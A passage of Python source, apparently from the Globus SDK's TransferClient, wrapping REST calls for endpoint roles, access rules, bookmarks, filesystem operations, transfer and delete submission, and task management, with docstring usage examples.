ID_PARAM_TYPE,\n requirements_data,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /endpoint//activate``\n\n :rtype: :class:`TransferResponse\n `\n\n Consider using autoactivate and web activation instead, described\n in the example for\n :meth:`~globus_sdk.TransferClient.endpoint_autoactivate`.\n\n **External Documentation**\n\n See\n `Activate endpoint \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.endpoint_activate({endpoint_id_s})\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"activate\")\n return self.post(path, data=requirements_data, query_params=query_params)\n\n def endpoint_get_activation_requirements(\n self, endpoint_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> ActivationRequirementsResponse:\n \"\"\"\n ``GET /endpoint//activation_requirements``\n\n :rtype: :class:`ActivationRequirementsResponse\n `\n\n **External Documentation**\n\n See\n `Get activation requirements \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"activation_requirements\")\n return ActivationRequirementsResponse(self.get(path, query_params=query_params))\n\n def my_effective_pause_rule_list(\n self, endpoint_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> IterableTransferResponse:\n \"\"\"\n ``GET /endpoint//my_effective_pause_rule_list``\n\n :rtype: :class:`IterableTransferResponse\n `\n\n **External Documentation**\n\n See\n `Get my effective endpoint pause rules \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.my_effective_pause_rule_list({endpoint_id_s}, ...)\")\n path = self.qjoin_path(\n \"endpoint\", endpoint_id_s, \"my_effective_pause_rule_list\"\n )\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n # Shared Endpoints\n\n def my_shared_endpoint_list(\n self, endpoint_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> IterableTransferResponse:\n \"\"\"\n ``GET /endpoint//my_shared_endpoint_list``\n\n :rtype: :class:`IterableTransferResponse\n `\n\n **External Documentation**\n\n See\n `Get shared endpoint list \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.my_shared_endpoint_list({endpoint_id_s}, ...)\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"my_shared_endpoint_list\")\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n @paging.has_paginator(\n paging.NextTokenPaginator,\n items_key=\"shared_endpoints\",\n )\n def get_shared_endpoint_list(\n self,\n endpoint_id: ID_PARAM_TYPE,\n max_results: Optional[int] = None,\n next_token: Optional[str] = None,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> IterableTransferResponse:\n \"\"\"\n ``GET /endpoint//shared_endpoint_list``\n\n :param max_results: cap to the number of results\n :type max_results: int, optional\n :param next_token: token used for paging\n :type next_token: str, optional\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_param: dict, optional\n\n\n :rtype: :class:`IterableTransferResponse\n `\n\n **External Documentation**\n\n See\n `Get shared endpoint list \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.get_shared_endpoint_list({endpoint_id_s}, ...)\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"shared_endpoint_list\")\n if query_params is None:\n query_params = {}\n if max_results is not None:\n query_params[\"max_results\"] = str(max_results)\n if next_token is not None:\n query_params[\"next_token\"] = str(next_token)\n return IterableTransferResponse(\n self.get(path, query_params=query_params), iter_key=\"shared_endpoints\"\n )\n\n def create_shared_endpoint(self, data):\n \"\"\"\n ``POST /shared_endpoint``\n\n :param data: A python dict representation of a ``shared_endpoint`` document\n :type data: dict\n :rtype: :class:`TransferResponse\n `\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> shared_ep_data = {\n >>> \"DATA_TYPE\": \"shared_endpoint\",\n >>> \"host_endpoint\": host_endpoint_id,\n >>> \"host_path\": host_path,\n >>> \"display_name\": display_name,\n >>> # optionally specify additional endpoint fields\n >>> \"description\": \"my test share\"\n >>> }\n >>> create_result = tc.create_shared_endpoint(shared_ep_data)\n >>> endpoint_id = create_result[\"id\"]\n\n **External Documentation**\n\n See\n `Create shared endpoint \\\n `_\n in the REST documentation for details.\n \"\"\"\n log.info(\"TransferClient.create_shared_endpoint(...)\")\n return self.post(\"shared_endpoint\", data=data)\n\n # Endpoint servers\n\n def endpoint_server_list(\n self, endpoint_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> IterableTransferResponse:\n \"\"\"\n ``GET /endpoint//server_list``\n\n :rtype: :class:`IterableTransferResponse\n `\n\n **External Documentation**\n\n See\n `Get endpoint server list \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.endpoint_server_list({endpoint_id_s}, ...)\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"server_list\")\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n def get_endpoint_server(\n self,\n endpoint_id: ID_PARAM_TYPE,\n server_id,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``GET /endpoint//server/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Get endpoint server by id\\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(\n \"TransferClient.get_endpoint_server(%s, %s, ...)\", endpoint_id_s, server_id\n )\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"server\", str(server_id))\n return self.get(path, query_params=query_params)\n\n def add_endpoint_server(\n self, endpoint_id: ID_PARAM_TYPE, server_data: Dict\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /endpoint//server``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Add endpoint server \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.add_endpoint_server({endpoint_id_s}, ...)\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"server\")\n return self.post(path, data=server_data)\n\n def update_endpoint_server(\n self, endpoint_id: ID_PARAM_TYPE, server_id, server_data: Dict\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``PUT /endpoint//server/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Update endpoint server by id \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(\n \"TransferClient.update_endpoint_server(%s, %s, ...)\",\n endpoint_id_s,\n server_id,\n )\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"server\", str(server_id))\n return self.put(path, data=server_data)\n\n def delete_endpoint_server(\n self, endpoint_id: ID_PARAM_TYPE, server_id\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``DELETE /endpoint//server/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Delete endpoint server by id \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(\n \"TransferClient.delete_endpoint_server(%s, %s)\", endpoint_id_s, server_id\n )\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"server\", str(server_id))\n return self.delete(path)\n\n #\n # Roles\n #\n\n def endpoint_role_list(\n self, endpoint_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> IterableTransferResponse:\n \"\"\"\n ``GET /endpoint//role_list``\n\n :rtype: :class:`IterableTransferResponse\n `\n\n **External Documentation**\n\n See\n `Get list of endpoint roles \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.endpoint_role_list({endpoint_id_s}, ...)\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"role_list\")\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n def add_endpoint_role(\n self, endpoint_id: ID_PARAM_TYPE, role_data: Dict\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /endpoint//role``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Create endpoint role \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.add_endpoint_role({endpoint_id_s}, ...)\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"role\")\n return self.post(path, data=role_data)\n\n def get_endpoint_role(\n self,\n endpoint_id: ID_PARAM_TYPE,\n role_id,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``GET /endpoint//role/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Get endpoint role by id \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.get_endpoint_role({endpoint_id_s}, {role_id}, ...)\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"role\", role_id)\n return self.get(path, query_params=query_params)\n\n def delete_endpoint_role(\n self, endpoint_id: ID_PARAM_TYPE, role_id\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``DELETE /endpoint//role/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Delete endpoint role by id \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.delete_endpoint_role({endpoint_id_s}, {role_id})\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"role\", role_id)\n return self.delete(path)\n\n #\n # ACLs\n #\n\n def endpoint_acl_list(\n self, endpoint_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> IterableTransferResponse:\n \"\"\"\n ``GET /endpoint//access_list``\n\n :rtype: :class:`IterableTransferResponse\n `\n\n **External Documentation**\n\n See\n `Get list of access rules \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.endpoint_acl_list({endpoint_id_s}, ...)\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"access_list\")\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n def get_endpoint_acl_rule(\n self,\n endpoint_id: ID_PARAM_TYPE,\n rule_id,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``GET /endpoint//access/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Get access rule by id \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(\n \"TransferClient.get_endpoint_acl_rule(%s, %s, ...)\", endpoint_id_s, rule_id\n )\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"access\", rule_id)\n return self.get(path, query_params=query_params)\n\n def add_endpoint_acl_rule(\n self, endpoint_id: ID_PARAM_TYPE, rule_data: Dict\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /endpoint//access``\n\n :param endpoint_id: ID of endpoint to which to add the acl\n :type endpoint_id: str\n :param rule_data: A python dict representation of an ``access`` document\n :type rule_data: dict\n :rtype: :class:`TransferResponse\n `\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> rule_data = {\n >>> \"DATA_TYPE\": \"access\",\n >>> \"principal_type\": \"identity\",\n >>> \"principal\": identity_id,\n >>> \"path\": \"/dataset1/\",\n >>> \"permissions\": \"rw\",\n >>> }\n >>> result = tc.add_endpoint_acl_rule(endpoint_id, rule_data)\n >>> rule_id = result[\"access_id\"]\n\n Note that if this rule is being created on a shared endpoint\n the \"path\" field is relative to the \"host_path\" of the shared endpoint.\n\n **External Documentation**\n\n See\n `Create access rule \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.add_endpoint_acl_rule({endpoint_id_s}, ...)\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"access\")\n return self.post(path, data=rule_data)\n\n def update_endpoint_acl_rule(\n self, endpoint_id: ID_PARAM_TYPE, rule_id, rule_data: Dict\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``PUT /endpoint//access/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Update access rule \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(\n \"TransferClient.update_endpoint_acl_rule(%s, %s, ...)\",\n endpoint_id_s,\n rule_id,\n )\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"access\", rule_id)\n return self.put(path, data=rule_data)\n\n def delete_endpoint_acl_rule(\n self, endpoint_id: ID_PARAM_TYPE, rule_id\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``DELETE /endpoint//access/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Delete access rule \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(\n \"TransferClient.delete_endpoint_acl_rule(%s, %s)\", endpoint_id_s, rule_id\n )\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"access\", rule_id)\n return self.delete(path)\n\n #\n # Bookmarks\n #\n\n def bookmark_list(\n self, query_params: Optional[Dict[str, Any]] = None\n ) -> IterableTransferResponse:\n \"\"\"\n ``GET /bookmark_list``\n\n :rtype: :class:`IterableTransferResponse\n `\n\n **External Documentation**\n\n See\n `Get list of bookmarks \\\n `_\n in the REST documentation for details.\n \"\"\"\n log.info(f\"TransferClient.bookmark_list({query_params})\")\n return IterableTransferResponse(\n self.get(\"bookmark_list\", query_params=query_params)\n )\n\n def create_bookmark(self, bookmark_data: Dict) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /bookmark``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Create bookmark \\\n `_\n in the REST documentation for details.\n \"\"\"\n log.info(f\"TransferClient.create_bookmark({bookmark_data})\")\n return self.post(\"bookmark\", data=bookmark_data)\n\n def get_bookmark(\n self, bookmark_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``GET /bookmark/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Get bookmark by id \\\n `_\n in the REST documentation for details.\n \"\"\"\n bookmark_id_s = utils.safe_stringify(bookmark_id)\n log.info(f\"TransferClient.get_bookmark({bookmark_id_s})\")\n path = self.qjoin_path(\"bookmark\", bookmark_id_s)\n return self.get(path, query_params=query_params)\n\n def update_bookmark(\n self, bookmark_id: ID_PARAM_TYPE, bookmark_data: Dict\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``PUT /bookmark/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Update bookmark \\\n `_\n in the REST documentation for details.\n \"\"\"\n bookmark_id_s = utils.safe_stringify(bookmark_id)\n log.info(f\"TransferClient.update_bookmark({bookmark_id_s})\")\n path = self.qjoin_path(\"bookmark\", bookmark_id_s)\n return self.put(path, data=bookmark_data)\n\n def delete_bookmark(\n self, bookmark_id: ID_PARAM_TYPE\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``DELETE /bookmark/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Delete bookmark by id\\\n `_\n in the REST documentation for details.\n \"\"\"\n bookmark_id_s = utils.safe_stringify(bookmark_id)\n log.info(f\"TransferClient.delete_bookmark({bookmark_id_s})\")\n path = self.qjoin_path(\"bookmark\", bookmark_id_s)\n return self.delete(path)\n\n #\n # Synchronous Filesys Operations\n #\n\n def operation_ls(\n self,\n endpoint_id: ID_PARAM_TYPE,\n path: Optional[str] = None,\n show_hidden: Optional[bool] = None,\n orderby: Optional[Union[str, List[str]]] = None,\n # note: filter is a soft keyword in python, so using this name is okay\n filter: Optional[str] = None,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> IterableTransferResponse:\n \"\"\"\n ``GET /operation/endpoint//ls``\n\n :param path: Path to a directory on the endpoint to list\n :type path: str, optional\n :param show_hidden: Show hidden files (names beginning in dot).\n Defaults to true.\n :type show_hidden: bool, optional\n :param orderby: One or more order-by options. Each option is\n either a field name or a field name followed by a space and 'ASC' or 'DESC'\n for ascending or descending.\n :type orderby: str, optional\n :param filter: Only return file documents that match these filter clauses. For\n the filter syntax, see the **External Documentation** linked below.\n :type filter: str, optional\n :rtype: :class:`IterableTransferResponse\n `\n\n **Examples**\n\n List with a path:\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> for entry in tc.operation_ls(ep_id, path=\"/~/project1/\"):\n >>> print(entry[\"name\"], entry[\"type\"])\n\n List with explicit ordering:\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> for entry in tc.operation_ls(\n >>> ep_id,\n >>> path=\"/~/project1/\",\n >>> orderby=[\"type\", \"name\"]\n >>> ):\n >>> print(entry[\"name DESC\"], entry[\"type\"])\n\n **External Documentation**\n\n See\n `List Directory Contents \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n\n if query_params is None:\n query_params = {}\n if path is not None:\n query_params[\"path\"] = path\n if show_hidden is not None:\n query_params[\"show_hidden\"] = 1 if show_hidden else 0\n if orderby is not None:\n if isinstance(orderby, str):\n query_params[\"orderby\"] = orderby\n else:\n query_params[\"orderby\"] = \",\".join(orderby)\n if filter is not None:\n query_params[\"filter\"] = filter\n\n log.info(f\"TransferClient.operation_ls({endpoint_id_s}, {query_params})\")\n req_path = self.qjoin_path(\"operation/endpoint\", endpoint_id_s, \"ls\")\n return IterableTransferResponse(self.get(req_path, query_params=query_params))\n\n def operation_mkdir(\n self,\n endpoint_id: ID_PARAM_TYPE,\n path,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /operation/endpoint//mkdir``\n\n :rtype: :class:`TransferResponse\n `\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> tc.operation_mkdir(ep_id, path=\"/~/newdir/\")\n\n **External Documentation**\n\n See\n `Make Directory \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n path = utils.safe_stringify(path)\n log.info(\n \"TransferClient.operation_mkdir({}, {}, {})\".format(\n endpoint_id_s, path, query_params\n )\n )\n resource_path = self.qjoin_path(\"operation/endpoint\", endpoint_id_s, \"mkdir\")\n json_body = {\"DATA_TYPE\": \"mkdir\", \"path\": path}\n return self.post(resource_path, data=json_body, query_params=query_params)\n\n def operation_rename(\n self,\n endpoint_id: ID_PARAM_TYPE,\n oldpath,\n newpath,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /operation/endpoint//rename``\n\n :rtype: :class:`TransferResponse\n `\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> tc.operation_rename(ep_id, oldpath=\"/~/file1.txt\",\n >>> newpath=\"/~/project1data.txt\")\n\n **External Documentation**\n\n See\n `Rename \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n oldpath = utils.safe_stringify(oldpath)\n newpath = utils.safe_stringify(newpath)\n log.info(\n \"TransferClient.operation_rename({}, {}, {}, {})\".format(\n endpoint_id_s, oldpath, newpath, query_params\n )\n )\n resource_path = self.qjoin_path(\"operation/endpoint\", endpoint_id_s, \"rename\")\n json_body = {\"DATA_TYPE\": \"rename\", \"old_path\": oldpath, \"new_path\": newpath}\n return self.post(resource_path, data=json_body, query_params=query_params)\n\n def operation_symlink(\n self,\n endpoint_id: ID_PARAM_TYPE,\n symlink_target,\n path,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /operation/endpoint//symlink``\n\n :rtype: :class:`TransferResponse\n `\n\n The ``path`` is the name of the symlink, and the ``symlink_target`` is\n the path referenced by the symlink.\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> tc.operation_symlink(ep_id, symlink_target=\"/~/file1.txt\",\n >>> path=\"/~/link-to-file1.txt\")\n\n **External Documentation**\n\n See\n `Symlink \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n symlink_target = utils.safe_stringify(symlink_target)\n path = utils.safe_stringify(path)\n log.info(\n \"TransferClient.operation_symlink({}, {}, {}, {})\".format(\n endpoint_id_s, symlink_target, path, query_params\n )\n )\n resource_path = self.qjoin_path(\"operation/endpoint\", endpoint_id_s, \"symlink\")\n data = {\n \"DATA_TYPE\": \"symlink\",\n \"symlink_target\": symlink_target,\n \"path\": path,\n }\n return self.post(resource_path, data=data, query_params=query_params)\n\n #\n # Task Submission\n #\n\n def get_submission_id(\n self, query_params: Optional[Dict[str, Any]] = None\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``GET /submission_id``\n\n :rtype: :class:`TransferResponse\n `\n\n Submission IDs are required to submit tasks to the Transfer service\n via the :meth:`submit_transfer <.submit_transfer>` and\n :meth:`submit_delete <.submit_delete>` methods.\n\n Most users will not need to call this method directly, as the\n convenience classes :class:`TransferData `\n and :class:`DeleteData ` will call it\n automatically if they are not passed a ``submission_id`` explicitly.\n\n **External Documentation**\n\n See\n `Get a submission id \\\n `_\n in the REST documentation for more details.\n \"\"\"\n log.info(f\"TransferClient.get_submission_id({query_params})\")\n return self.get(\"submission_id\", query_params=query_params)\n\n def submit_transfer(self, data) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /transfer``\n\n :rtype: :class:`TransferResponse\n `\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> tdata = globus_sdk.TransferData(tc, source_endpoint_id,\n >>> destination_endpoint_id,\n >>> label=\"SDK example\",\n >>> sync_level=\"checksum\")\n >>> tdata.add_item(\"/source/path/dir/\", \"/dest/path/dir/\",\n >>> recursive=True)\n >>> tdata.add_item(\"/source/path/file.txt\",\n >>> \"/dest/path/file.txt\")\n >>> transfer_result = tc.submit_transfer(tdata)\n >>> print(\"task_id =\", transfer_result[\"task_id\"])\n\n The `data` parameter can be a normal Python dictionary, or\n a :class:`TransferData ` object.\n\n **External Documentation**\n\n See\n `Submit a transfer task \\\n `_\n in the REST documentation for more details.\n \"\"\"\n log.info(\"TransferClient.submit_transfer(...)\")\n return self.post(\"/transfer\", data=data)\n\n def submit_delete(self, data) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /delete``\n\n :rtype: :class:`TransferResponse\n `\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> ddata = globus_sdk.DeleteData(tc, endpoint_id, recursive=True)\n >>> ddata.add_item(\"/dir/to/delete/\")\n >>> ddata.add_item(\"/file/to/delete/file.txt\")\n >>> delete_result = tc.submit_delete(ddata)\n >>> print(\"task_id =\", delete_result[\"task_id\"])\n\n The `data` parameter can be a normal Python dictionary, or\n a :class:`DeleteData ` object.\n\n **External Documentation**\n\n See\n `Submit a delete task \\\n `_\n in the REST documentation for details.\n \"\"\"\n log.info(\"TransferClient.submit_delete(...)\")\n return self.post(\"/delete\", data=data)\n\n #\n # Task inspection and management\n #\n\n @paging.has_paginator(\n paging.LimitOffsetTotalPaginator,\n items_key=\"DATA\",\n get_page_size=_get_page_size,\n max_total_results=1000,\n page_size=1000,\n )\n def task_list(\n self,\n limit: Optional[int] = None,\n offset: Optional[int] = None,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> IterableTransferResponse:\n \"\"\"\n Get an iterable of task documents owned by the current user.\n\n ``GET /task_list``\n\n :param limit: limit the number of results\n :type limit: int, optional\n :param offset: offset used in paging\n :type offset: int, optional\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`IterableTransferResponse\n `\n\n **Examples**\n\n Fetch 10 tasks and print some basic info:\n\n >>> tc = TransferClient(...)\n >>> for task in tc.task_list(limit=10):\n >>> print(\"Task({}): {} -> {}\".format(\n >>> task[\"task_id\"], task[\"source_endpoint\"],\n >>> task[\"destination_endpoint\"]))\n\n **External Documentation**\n\n See\n `Task list \\\n `_\n in the REST documentation for details.\n \"\"\"\n log.info(\"TransferClient.task_list(...)\")\n if query_params is None:\n query_params = {}\n if limit is not None:\n query_params[\"limit\"] = limit\n if offset is not None:\n query_params[\"offset\"] = offset\n return IterableTransferResponse(\n self.get(\"task_list\", query_params=query_params)\n )\n\n @paging.has_paginator(\n paging.LimitOffsetTotalPaginator,\n items_key=\"DATA\",\n get_page_size=_get_page_size,\n max_total_results=1000,\n page_size=1000,\n )\n def task_event_list(\n self,\n task_id: ID_PARAM_TYPE,\n limit: Optional[int] = None,\n offset: Optional[int] = None,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> IterableTransferResponse:\n r\"\"\"\n List events (for example, faults and errors) for a given Task.\n\n ``GET /task//event_list``\n\n :param task_id: The ID of the task to inspect.\n :type task_id: str\n :param limit: limit the number of results\n :type limit: int, optional\n :param offset: offset used in paging\n :type offset: int, optional\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`IterableTransferResponse\n `\n\n **Examples**\n\n Fetch 10 events and print some basic info:\n\n >>> tc = TransferClient(...)\n >>> task_id = ...\n >>> for event in tc.task_event_list(task_id, limit=10):\n >>> print(\"Event on Task({}) at {}:\\n{}\".format(\n >>> task_id, event[\"time\"], event[\"description\"])\n\n **External Documentation**\n\n See\n `Get event list \\\n `_\n in the REST documentation for details.\n \"\"\"\n task_id_s = utils.safe_stringify(task_id)\n log.info(f\"TransferClient.task_event_list({task_id_s}, ...)\")\n path = self.qjoin_path(\"task\", task_id_s, \"event_list\")\n if query_params is None:\n query_params = {}\n if limit is not None:\n query_params[\"limit\"] = limit\n if offset is not None:\n query_params[\"offset\"] = offset\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n def get_task(\n self, task_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``GET /task/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Get task by id \\\n `_\n in the REST documentation for details.\n \"\"\"\n task_id_s = utils.safe_stringify(task_id)\n log.info(f\"TransferClient.get_task({task_id_s}, ...)\")\n resource_path = self.qjoin_path(\"task\", task_id_s)\n return self.get(resource_path, query_params=query_params)\n\n def update_task(\n self,\n task_id: ID_PARAM_TYPE,\n data: Dict,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``PUT /task/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Update task by id \\\n `_\n in the REST documentation for details.\n \"\"\"\n task_id_s = utils.safe_stringify(task_id)\n log.info(f\"TransferClient.update_task({task_id_s}, ...)\")\n resource_path = self.qjoin_path(\"task\", task_id_s)\n return self.put(resource_path, data=data, query_params=query_params)\n\n def cancel_task(self, task_id: ID_PARAM_TYPE) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /task//cancel``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Cancel task by id \\\n `_\n in the REST documentation for details.\n \"\"\"\n task_id_s = utils.safe_stringify(task_id)\n log.info(f\"TransferClient.cancel_task({task_id_s})\")\n resource_path = self.qjoin_path(\"task\", task_id_s, \"cancel\")\n return self.post(resource_path)\n\n def task_wait(\n self, task_id: ID_PARAM_TYPE, timeout=10, polling_interval=10\n ) -> bool:\n r\"\"\"\n Wait until a Task is complete or fails, with a time limit. If the task\n is \"ACTIVE\" after time runs out, returns ``False``. Otherwise returns\n ``True``.\n\n :param task_id: ID of the Task to wait on for completion\n :type task_id: str\n :param timeout: Number of seconds to wait in total. Minimum 1. [Default: ``10``]\n :type timeout: int, optional\n :param polling_interval: Number of seconds between queries to Globus about the\n Task status. Minimum 1. [Default: ``10``]\n :type polling_interval: int, optional\n\n **Examples**\n\n If you want to wait for a task to terminate, but want to warn every\n minute that it doesn't terminate, you could:\n\n >>> tc = TransferClient(...)\n >>> while not tc.task_wait(task_id, timeout=60):\n >>> print(\"Another minute went by without {0} terminating\"\n >>> .format(task_id))\n\n Or perhaps you want to check on a task every minute for 10 minutes, and\n give up if it doesn't complete in that time:\n\n >>> tc = TransferClient(...)\n >>> done = tc.task_wait(task_id, timeout=600, polling_interval=60):\n >>> if not done:\n >>> print(\"{0} didn't successfully terminate!\"\n >>> .format(task_id))\n >>> else:\n >>> print(\"{0} completed\".format(task_id))\n\n You could print dots while you wait for a task by only waiting one\n second at a time:\n\n >>> tc = TransferClient(...)\n >>> while not tc.task_wait(task_id, timeout=1, polling_interval=1):\n >>> print(\".\", end=\"\")\n >>> print(\"\\n{0} completed!\".format(task_id))\n \"\"\"\n task_id_s = utils.safe_stringify(task_id)\n log.info(\n \"TransferClient.task_wait({}, {}, {})\".format(\n task_id_s, timeout, polling_interval\n )\n )\n\n # check valid args\n if timeout < 1:\n 